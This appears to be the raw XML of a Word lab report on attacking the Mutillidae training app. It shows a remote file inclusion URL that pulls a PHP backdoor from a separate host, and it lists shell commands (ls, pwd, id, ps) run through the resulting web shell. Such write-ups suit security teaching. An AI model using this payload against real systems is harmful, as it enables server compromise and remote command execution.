    <w:p w14:paraId="3F4DF55D" w14:textId="60FDB8E2" w:rsidR="00007C74" w:rsidRPr="00930874" w:rsidRDefault="00007C74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2F32CA51" wp14:editId="3D17E7F1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943600" cy="293814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74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>http://mutillidae/index.php?page=http://192.168.56.102:8888/simple-backdoor.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EECF609" w14:textId="477ACA47" w:rsidR="00A82D82" w:rsidRPr="00930874" w:rsidRDefault="00A82D82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479DBA5A" w14:textId="54AA9782" w:rsidR="00A82D82" w:rsidRPr="00930874" w:rsidRDefault="00007C74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>we have successfully uploaded our php file on sever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F833623" w14:textId="57C0A35F" w:rsidR="00007C74" w:rsidRPr="00930874" w:rsidRDefault="00007C74">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1448585E" w14:textId="47C8B91A" w:rsidR="00007C74" w:rsidRPr="00930874" w:rsidRDefault="000068AD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7F0A25AC" wp14:editId="12B93EFE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5943600" cy="325628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74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">we used </w:t>
      </w:r>
      <w:r w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">ls </w:t>
      </w:r>
      <w:r w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to in url </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25238000" w14:textId="452BDC56" w:rsidR="000068AD" w:rsidRPr="00930874" w:rsidRDefault="000068AD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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">we used </w:t>
      </w:r>
      <w:r w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">pwd </w:t>
      </w:r>
      <w:r w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">command in url </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCB246F" w14:textId="77777777" w:rsidR="000068AD" w:rsidRPr="00930874" w:rsidRDefault="000068AD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ECE19E" wp14:editId="59A19B80">
            <wp:extent cx="5943600" cy="4120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D5E" w14:textId="771C5197" w:rsidR="000068AD" w:rsidRPr="00930874" w:rsidRDefault="000068AD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5648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C5AB6A6" wp14:editId="7A2F5D9F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-114300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>205740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3688080"/>
            <wp:effectExtent l="0" t="0" r="0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74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">we used </w:t>
      </w:r>
      <w:r w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">id </w:t>
      </w:r>
      <w:r w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB0A94E" w14:textId="4381BB31" w:rsidR="000068AD" w:rsidRDefault="00930874">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009308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65CE55D3" wp14:editId="292E1A2F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-312420</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4030345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="333438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68AD" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">we used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ls -al</w:t>
      </w:r>
      <w:r w:rsidR="000068AD" w:rsidRPr="009308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825431" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A3FB76" w14:textId="6CAC9227" w:rsidR="00930874" w:rsidRPr="00930874" w:rsidRDefault="00930874">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="709F09CA" w14:textId="5D2903C7" w:rsidR="000068AD" w:rsidRPr="00930874" w:rsidRDefault="009308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308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6672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E4ACCB0" wp14:editId="0D00BBF3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-190500</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>307340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="4053840"/>
            <wp:effectExtent l="0" t="0" r="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431" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">we used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r w:rsidR="00825431" w:rsidRPr="009308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825431" w:rsidRPr="00930874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5089E101" w14:textId="7C5EFB59" w:rsidR="00825431" w:rsidRPr="00930874" w:rsidRDefault="00825431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B5AE703" w14:textId="697307BA" w:rsidR="000068AD" w:rsidRPr="00930874" w:rsidRDefault="000068AD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D60BB4E" w14:textId="700F8945" w:rsidR="00A82D82" w:rsidRPr="00930874" w:rsidRDefault="00A82D82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB3B69F" w14:textId="7E765AB3" w:rsidR="00A82D82" w:rsidRPr="00930874" w:rsidRDefault="00A82D82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7843B422" w14:textId="6B664B78" w:rsidR="00A82D82" w:rsidRPr="00930874" w:rsidRDefault="00A82D82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="549EED5A" w14:textId="2F9C49AE" w:rsidR="00A82D82" w:rsidRPr="00930874" w:rsidRDefault="00A82D82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DC84374" w14:textId="6CDB65C1" w:rsidR="00A82D82" w:rsidRPr="00930874" w:rsidRDefault="00A82D82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="029AD054" w14:textId="2517BC07" w:rsidR="009B7E35" w:rsidRPr="00930874" w:rsidRDefault="009B7E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009B7E35" w:rsidRPr="009308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7DB"/>
    <w:rsid w:val="000068AD"/>
    <w:rsid w:val="00007C74"/>
    <w:rsid w:val="001167D2"/>
    <w:rsid w:val="0053646D"/>
    <w:rsid w:val="005677DB"/>
    <w:rsid w:val="00590FE5"/>
    <w:rsid w:val="005E41A2"/>
    <w:rsid w:val="0064525F"/>
    <w:rsid w:val="006F2C5F"/>
    <w:rsid w:val="00714D41"/>
    <w:rsid w:val="007F07E5"/>
    <w:rsid w:val="00825431"/>
    <w:rsid w:val="00930874"/>
    <w:rsid w:val="009B7E35"/>
    <w:rsid w:val="00A82D82"/>
    <w:rsid w:val="00AA0EAB"/>
    <w:rsid w:val="00C826D2"/>
    <w:rsid w:val="00D95ED0"/>
    <w:rsid w:val="00E7566C"/>
    <w:rsid w:val="00E83C15"/>
    <w:rsid w:val="00ED726B"/>
    <w:rsid w:val="00F40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FD479"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{84A89DEC-A496-4A11-9903-420D0806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05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5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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-20T01:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-20T03:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>